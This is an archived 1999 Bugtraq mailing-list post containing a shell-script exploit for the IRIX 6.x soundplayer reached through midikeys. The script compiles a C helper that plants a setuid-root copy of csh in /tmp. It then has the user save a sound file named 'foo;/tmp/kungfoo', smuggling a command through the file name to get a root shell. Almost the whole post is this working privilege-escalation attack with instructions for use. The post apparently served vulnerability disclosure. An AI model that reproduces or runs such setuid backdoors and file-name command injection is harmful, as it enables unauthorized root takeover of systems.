[13169] in bugtraq
irix-soundplayer.sh
daemon@ATHENA.MIT.EDU (Loneguard)
Fri Dec 31 13:22:19 1999
Message-Id: <19991231112220.B283C1FA59@lists.securityfocus.com>
Date: Fri, 31 Dec 1999 03:22:20 -0800
Reply-To: Loneguard <loneguard@CRAZYMONKEY.ORG>
From: Loneguard <loneguard@CRAZYMONKEY.ORG>
X-To: bugtraq@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM
midikeys might not setuid these days but you get the idea...
#!/bin/sh
#
# Irix 6.x soundplayer xploit - Loneguard 20/02/99
#
# Good example of how bad coding in a non-setuid/priviledged process
# can offer up rewt
#
cat > /tmp/crazymonkey.c << 'EOF'
main() {
setuid(0);
system("cp /bin/csh /tmp/xsh;chmod 4755 /tmp/xsh");
}
EOF
cc -o /tmp/kungfoo crazymonkey.c
/usr/sbin/midikeys &
echo "You should now see the midikeys window, goto the menu that allows you to play sounds and load a wav. This will bring up a soundplayer window. Save the wav as 'foo;/tmp/kungfoo' and go find a rewt shell in tmp"
